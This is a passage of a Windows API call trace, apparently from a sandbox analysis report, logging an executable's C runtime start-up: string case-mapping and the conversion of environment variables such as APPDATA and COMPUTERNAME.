\x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0097.028] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0097.029] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x18f4e8, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸȀ") returned 256 [0097.029] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸȀ", cchWideChar=256, lpMultiByteStr=0x18fba8, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9f \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿõ\x1d\x01ÿäþ\x18", lpUsedDefaultChar=0x0) returned 256 [0097.064] IsProcessorFeaturePresent (ProcessorFeature=0xa) returned 1 [0097.064] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x431d5b) returned 0x0 [0097.064] RtlSizeHeap (HeapHandle=0x5f0000, Flags=0x0, MemoryPointer=0x610f20) returned 0x80 [0097.132] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 31 [0097.132] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x8, Size=0x1f) returned 0x60eb58 [0097.132] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=-1, lpMultiByteStr=0x60eb58, cbMultiByte=31, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ALLUSERSPROFILE=C:\\ProgramData", lpUsedDefaultChar=0x0) returned 31 [0097.168] GetLastError () returned 0x0 [0097.168] SetLastError (dwErrCode=0x0) [0097.168] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x4) returned 0x601a60 [0097.168] RtlSizeHeap (HeapHandle=0x5f0000, Flags=0x0, MemoryPointer=0x601a60) returned 0x4 [0097.168] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x601a60, Size=0x8) returned 0x601a60 [0097.168] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="APPDATA=C:\\Users\\kEecfMwgj\\AppData\\Roaming", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 43 [0097.168] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x8, Size=0x2b) returned 0x60b460 [0097.168] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="APPDATA=C:\\Users\\kEecfMwgj\\AppData\\Roaming", cchWideChar=-1, lpMultiByteStr=0x60b460, cbMultiByte=43, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="APPDATA=C:\\Users\\kEecfMwgj\\AppData\\Roaming", lpUsedDefaultChar=0x0) returned 43 [0097.168] GetLastError () returned 0x0 [0097.168] SetLastError (dwErrCode=0x0) [0097.169] GetLastError () returned 0x0 [0097.169] SetLastError (dwErrCode=0x0) [0097.169] GetLastError () returned 0x0 [0097.169] SetLastError (dwErrCode=0x0) [0097.199] RtlSizeHeap (HeapHandle=0x5f0000, Flags=0x0, MemoryPointer=0x601a60) returned 0x8 [0097.199] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x601a60, Size=0xc) returned 0x611618 [0097.199] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CommonProgramFiles=C:\\Program Files (x86)\\Common Files", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 55 [0097.199] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x8, Size=0x37) returned 0x611630 [0097.200] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CommonProgramFiles=C:\\Program Files (x86)\\Common Files", cchWideChar=-1, lpMultiByteStr=0x611630, cbMultiByte=55, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CommonProgramFiles=C:\\Program Files (x86)\\Common Files", lpUsedDefaultChar=0x0) returned 55 [0097.200] GetLastError () returned 0x0 [0097.200] SetLastError (dwErrCode=0x0) [0097.200] GetLastError () returned 0x0 [0097.200] SetLastError (dwErrCode=0x0) [0097.200] GetLastError () returned 0x0 [0097.200] SetLastError (dwErrCode=0x0) [0097.200] GetLastError () returned 0x0 [0097.200] SetLastError (dwErrCode=0x0) [0097.200] GetLastError () returned 0x0 [0097.200] SetLastError (dwErrCode=0x0) [0097.200] RtlSizeHeap (HeapHandle=0x5f0000, Flags=0x0, MemoryPointer=0x611618) returned 0xc [0097.200] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x611618, Size=0x10) returned 0x611618 [0097.200] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CommonProgramFiles(x86)=C:\\Program Files (x86)\\Common Files", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 60 [0097.200] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x8, Size=0x3c) returned 0x602568 [0097.200] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CommonProgramFiles(x86)=C:\\Program Files (x86)\\Common Files", cchWideChar=-1, lpMultiByteStr=0x602568, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CommonProgramFiles(x86)=C:\\Program Files (x86)\\Common Files", lpUsedDefaultChar=0x0) returned 60 [0097.200] GetLastError () returned 0x0 [0097.200] SetLastError (dwErrCode=0x0) [0097.200] GetLastError () returned 0x0 [0097.200] SetLastError (dwErrCode=0x0) [0097.200] GetLastError () returned 0x0 [0097.200] SetLastError (dwErrCode=0x0) [0097.200] GetLastError () returned 0x0 [0097.200] SetLastError (dwErrCode=0x0) [0097.200] GetLastError () returned 0x0 [0097.201] SetLastError (dwErrCode=0x0) [0097.201] GetLastError () returned 0x0 [0097.201] SetLastError (dwErrCode=0x0) [0097.201] GetLastError () returned 0x0 [0097.201] SetLastError (dwErrCode=0x0) [0097.201] RtlSizeHeap (HeapHandle=0x5f0000, Flags=0x0, MemoryPointer=0x611618) returned 0x10 [0097.201] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x611618, Size=0x14) returned 0x611670 [0097.201] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CommonProgramW6432=C:\\Program Files\\Common Files", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 49 [0097.201] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x8, Size=0x31) returned 0x611690 [0097.201] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CommonProgramW6432=C:\\Program Files\\Common Files", cchWideChar=-1, lpMultiByteStr=0x611690, cbMultiByte=49, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CommonProgramW6432=C:\\Program Files\\Common Files", lpUsedDefaultChar=0x0) returned 49 [0097.201] GetLastError () returned 0x0 [0097.201] SetLastError (dwErrCode=0x0) [0097.201] GetLastError () returned 0x0 [0097.201] SetLastError (dwErrCode=0x0) [0097.201] GetLastError () returned 0x0 [0097.201] SetLastError (dwErrCode=0x0) [0097.201] GetLastError () returned 0x0 [0097.201] SetLastError (dwErrCode=0x0) [0097.201] GetLastError () returned 0x0 [0097.201] SetLastError (dwErrCode=0x0) [0097.201] GetLastError () returned 0x0 [0097.201] SetLastError (dwErrCode=0x0) [0097.201] GetLastError () returned 0x0 [0097.201] SetLastError (dwErrCode=0x0) [0097.201] GetLastError () returned 0x0 [0097.202] SetLastError (dwErrCode=0x0) [0097.202] GetLastError () returned 0x0 [0097.202] SetLastError (dwErrCode=0x0) [0097.202] RtlSizeHeap (HeapHandle=0x5f0000, Flags=0x0, MemoryPointer=0x611670) returned 0x14 [0097.202] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x611670, Size=0x18) returned 0x611670 [0097.202] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="COMPUTERNAME=Q9IATRKPRH", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0097.202] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x8, Size=0x18) returned 0x6116d0 [0097.202] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="COMPUTERNAME=Q9IATRKPRH", cchWideChar=-1, lpMultiByteStr=0x6116d0, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="COMPUTERNAME=Q9IATRKPRH", lpUsedDefaultChar=0x0) returned 24 [0097.202] GetLastError () returned 0x0 [0097.202] SetLastError (dwErrCode=0x0) [0097.202] GetLastError () returned 0x0 [0097.202] SetLastError (dwErrCode=0x0) [0097.202] GetLastError () returned 0x0 [0097.202] SetLastError (dwErrCode=0x0) [0097.202] GetLastError () returned 0x0 [0097.202] SetLastError (dwErrCode=0x0) [0097.202] GetLastError () returned 0x0 [0097.202] SetLastError (dwErrCode=0x0) [0097.202] GetLastError () returned 0x0 [0097.202] SetLastError (dwErrCode=0x0) [0097.202] GetLastError () returned 0x0 [0097.202] SetLastError (dwErrCode=0x0) [0097.202] GetLastError () returned 0x0 [0097.202] SetLastError (dwErrCode=0x0) [0097.202] GetLastError () returned 0x0 [0097.202] SetLastError (dwErrCode=0x0) [0097.203] GetLastError () returned 0x0 [0097.203] SetLastError (dwErrCode=0x0) [0097.203] GetLastError () returned 0x0 [0097.203] SetLastError (dwErrCode=0x0) [0097.203] RtlSizeHeap (HeapHandle=0x5f0000, Flags=0x0, MemoryPointer=0x611670) returned 0x18 [0097.203] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x611670, Size=0x1c) returned 0x6116f0 [0097.203] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ComSpec=C:\\Windows\\system32\\cmd.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 36 [0097.203] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x8, Size=0x24) returned 0x60ad90 [0097.203] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ComSpec=C:\\Windows\\system32\\cmd.exe", cchWideChar=-1, lpMultiByteStr=0x60ad90, cbMultiByte=36, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ComSpec=C:\\Windows\\system32\\cmd.exe", lpUsedDefaultChar=0x0) returned 36 [0097.203] GetLastError () returned 0x0 [0097.203] SetLastError (dwErrCode=0x0) [0097.203] GetLastError () returned 0x0 [0097.203] SetLastError (dwErrCode=0x0) [0097.203] GetLastError () returned 0x0 [0097.203] SetLastError (dwErrCode=0x0) [0097.203] GetLastError () returned 0x0 [0097.203] SetLastError (dwErrCode=0x0) [0097.203] GetLastError () returned 0x0 [0097.203] SetLastError (dwErrCode=0x0) [0097.203] GetLastError () returned 0x0 [0097.203] SetLastError (dwErrCode=0x0) [0097.203] GetLastError () returned 0x0 [0097.203] SetLastError (dwErrCode=0x0) [0097.203] GetLastError () returned 0x0 [0097.203] SetLastError (dwErrCode=0x0) [0097.203] GetLastError () returned 0x0 [0097.204] SetLastError (dwErrCode=0x0) [0097.204] GetLastError () returned 0x0 [0097.204] SetLastError (dwErrCode=0x0) [0097.204] GetLastError () returned 0x0 [0097.204] SetLastError (dwErrCode=0x0) [0097.204] GetLastError () returned 0x0 [0097.204] SetLastError (dwErrCode=0x0) [0097.204] GetLastError () returned 0x0 [0097.204] SetLastError (dwErrCode=0x0) [0097.204] RtlSizeHeap (HeapHandle=0x5f0000, Flags=0x0, MemoryPointer=0x6116f0) returned 0x1c [0097.204] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x6116f0, Size=0x20) returned 0x6116f0 [0097.204] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="FP_NO_HOST_CHECK=NO", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0097.204] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x8, Size=0x14) returned 0x611670 [0097.204] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="FP_NO_HOST_CHECK=NO", cchWideChar=-1, lpMultiByteStr=0x611670, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="FP_NO_HOST_CHECK=NO", lpUsedDefaultChar=0x0) returned 20 [0097.204] GetLastError () returned 0x0 [0097.204] SetLastError (dwErrCode=0x0) [0097.204] GetLastError () returned 0x0 [0097.204] SetLastError (dwErrCode=0x0) [0097.204] GetLastError () returned 0x0 [0097.204] SetLastError (dwErrCode=0x0) [0097.204] GetLastError () returned 0x0 [0097.204] SetLastError (dwErrCode=0x0) [0097.204] GetLastError () returned 0x0 [0097.204] SetLastError (dwErrCode=0x0) [0097.204] GetLastError () returned 0x0 [0097.204] SetLastError (dwErrCode=0x0) [0097.205] GetLastError () returned 0x0 [0097.205] SetLastError (dwErrCode=0x0) [0097.205] GetLastError () returned 0x0 [0097.205] SetLastError (dwErrCode=0x0) [0097.205] GetLastError () returned 0x0 [0097.205] SetLastError (dwErrCode=0x0) [0097.205] GetLastError () returned 0x0 [0097.205] SetLastError (dwErrCode=0x0) [0097.205] GetLastError () returned 0x0 [0097.205] SetLastError (dwErrCode=0x0) [0097.205] GetLastError () returned 0x0 [0097.205] SetLastError (dwErrCode=0x0) [0097.205] GetLastError () returned 0x0 [0097.205] SetLastError (dwErrCode=0x0) [0097.205] GetLastError () returned 0x0 [0097.205] SetLastError (dwErrCode=0x0) [0097.205] GetLastError () returned 0x0 [0097.205] SetLastError (dwErrCode=0x0) [0097.205] RtlSizeHeap (HeapHandle=0x5f0000, Flags=0x0, MemoryPointer=0x6116f0) returned 0x20 [0097.205] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x6116f0, Size=0x24) returned 0x6116f0 [0097.205] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HOMEDRIVE=C:", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0097.205] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x8, Size=0xd) returned 0x603220 [0097.205] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HOMEDRIVE=C:", cchWideChar=-1, lpMultiByteStr=0x603220, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HOMEDRIVE=C:", lpUsedDefaultChar=0x0) returned 13 [0097.205] GetLastError () returned 0x0 [0097.205] SetLastError (dwErrCode=0x0) [0097.205] GetLastError () returned 0x0 [0097.205] SetLastError (dwErrCode=0x0) [0097.205] GetLastError () returned 0x0 [0097.205] SetLastError (dwErrCode=0x0) [0097.205] GetLastError () returned 0x0 [0097.206] SetLastError (dwErrCode=0x0) [0097.206] GetLastError () returned 0x0 [0097.206] SetLastError (dwErrCode=0x0) [0097.206] GetLastError () returned 0x0 [0097.206] SetLastError (dwErrCode=0x0) [0097.206] GetLastError () returned 0x0 [0097.206] SetLastError (dwErrCode=0x0) [0097.206] GetLastError () returned 0x0 [0097.206] SetLastError (dwErrCode=0x0) [0097.206] GetLastError () returned 0x0 [0097.206] SetLastError (dwErrCode=0x0) [0097.206] GetLastError () returned 0x0 [0097.206] SetLastError (dwErrCode=0x0) [0097.206] GetLastError () returned 0x0 [0097.206] SetLastError (dwErrCode=0x0) [0097.206] GetLastError () returned 0x0 [0097.206] SetLastError (dwErrCode=0x0) [0097.206] GetLastError () returned 0x0 [0097.206] SetLastError (dwErrCode=0x0) [0097.206] GetLastError () returned 0x0 [0097.206] SetLastError (dwErrCode=0x0) [0097.206] GetLastError () returned 0x0 [0097.206] SetLastError (dwErrCode=0x0) [0097.206] GetLastError () returned 0x0 [0097.206] SetLastError (dwErrCode=0x0) [0097.206] GetLastError () returned 0x0 [0097.206] SetLastError (dwErrCode=0x0) [0097.206] RtlSizeHeap (HeapHandle=0x5f0000, Flags=0x0, MemoryPointer=0x6116f0) returned 0x24 [0097.206] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x6116f0, Size=0x28) returned 0x6116f0 [0097.206] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HOMEPATH=\\Users\\kEecfMwgj", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 26 [0097.206] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x8, Size=0x1a) returned 0x60eb80 [0097.207] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HOMEPATH=\\Users\\kEecfMwgj", cchWideChar=-1, lpMultiByteStr=0x60eb80, cbMultiByte=26, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HOMEPATH=\\Users\\kEecfMwgj", lpUsedDefaultChar=0x0) returned 26 [0097.207] GetLastError () returned 0x0 [0097.207] SetLastError (dwErrCode=0x0) [0097.207] GetLastError () returned 0x0 [0097.207] SetLastError (dwErrCode=0x0) [0097.207] GetLastError () returned 0x0 [0097.207] SetLastError (dwErrCode=0x0) [0097.207] GetLastError () returned 0x0 [0097.207] SetLastError (dwErrCode=0x0) [0097.207] GetLastError () returned 0x0 [0097.207] SetLastError (dwErrCode=0x0) [0097.207] GetLastError () returned 0x0 [0097.207] SetLastError (dwErrCode=0x0) [0097.207] GetLastError () returned 0x0 [0097.207] SetLastError (dwErrCode=0x0) [0097.207] GetLastError () returned 0x0 [0097.207] SetLastError (dwErrCode=0x0) [0097.207] GetLastError () returned 0x0 [0097.207] SetLastError (dwErrCode=0x0) [0097.207] GetLastError () returned 0x0 [0097.207] SetLastError (dwErrCode=0x0) [0097.207] GetLastError () returned 0x0 [0097.207] SetLastError (dwErrCode=0x0) [0097.207] GetLastError () returned 0x0 [0097.207] SetLastError (dwErrCode=0x0) [0097.207] GetLastError () returned 0x0 [0097.207] SetLastError (dwErrCode=0x0) [0097.207] GetLastError () returned 0x0 [0097.207] SetLastError (dwErrCode=0x0) [0097.207] GetLastError () returned 0x0 [0097.208] SetLastError (dwErrCode=0x0) [0097.208] GetLastError () returned 0x0 [0097.208] SetLastError (dwErrCode=0x0) [0097.208] GetLastError () returned 0x0 [0097.208] SetLastError (dwErrCode=0x0) [0097.208] GetLastError () returned 0x0 [0097.208] SetLastError (dwErrCode=0x0) [0097.208] GetLastError () returned 0x0 [0097.208] SetLastError (dwErrCode=0x0) [0097.208] RtlSizeHeap (HeapHandle=0x5f0000, Flags=0x0, MemoryPointer=0x6116f0) returned 0x28 [0097.208] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x6116f0, Size=0x2c) returned 0x6116f0 [0097.208] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="LOCALAPPDATA=C:\\Users\\kEecfMwgj\\AppData\\Local", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 46 [0097.208] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x8, Size=0x2e) returned 0x60b498 [0097.208] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="LOCALAPPDATA=C:\\Users\\kEecfMwgj\\AppData\\Local", cchWideChar=-1, lpMultiByteStr=0x60b498, cbMultiByte=46, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LOCALAPPDATA=C:\\Users\\kEecfMwgj\\AppData\\Local", lpUsedDefaultChar=0x0) returned 46 [0097.208] GetLastError () returned 0x0 [0097.208] SetLastError (dwErrCode=0x0) [0097.208] GetLastError () returned 0x0 [0097.208] SetLastError (dwErrCode=0x0) [0097.208] GetLastError () returned 0x0 [0097.208] SetLastError (dwErrCode=0x0) [0097.208] GetLastError () returned 0x0 [0097.208] SetLastError (dwErrCode=0x0) [0097.208] GetLastError () returned 0x0 [0097.208] SetLastError (dwErrCode=0x0) [0097.208] GetLastError () returned 0x0 [0097.208] SetLastError (dwErrCode=0x0) [0097.208] GetLastError () returned 0x0 [0097.208] SetLastError (dwErrCode=0x0) [0097.209] GetLastError () returned 0x0 [0097.209] SetLastError (dwErrCode=0x0) [0097.209] GetLastError () returned 0x0 [0097.209] SetLastError (dwErrCode=0x0) [0097.209] GetLastError () returned 0x0 [0097.209] SetLastError (dwErrCode=0x0) [0097.209] GetLastError () returned 0x0 [0097.209] SetLastError (dwErrCode=0x0) [0097.209] GetLastError () returned 0x0 [0097.209] SetLastError (dwErrCode=0x0) [0097.209] GetLastError () returned 0x0 [0097.209] SetLastError (dwErrCode=0x0) [0097.209] GetLastError () returned 0x0 [0097.209] SetLastError (dwErrCode=0x0) [0097.209] GetLastError () returned 0x0 [0097.209] SetLastError (dwErrCode=0x0) [0097.209] GetLastError () returned 0x0 [0097.209] SetLastError (dwErrCode=0x0) [0097.209] GetLastError () returned 0x0 [0097.209] SetLastError (dwErrCode=0x0) [0097.209] GetLastError () returned 0x0 [0097.209] SetLastError (dwErrCode=0x0) [0097.209] GetLastError () returned 0x0 [0097.209] SetLastError (dwErrCode=0x0) [0097.209] GetLastError () returned 0x0 [0097.209] SetLastError (dwErrCode=0x0) [0097.209] 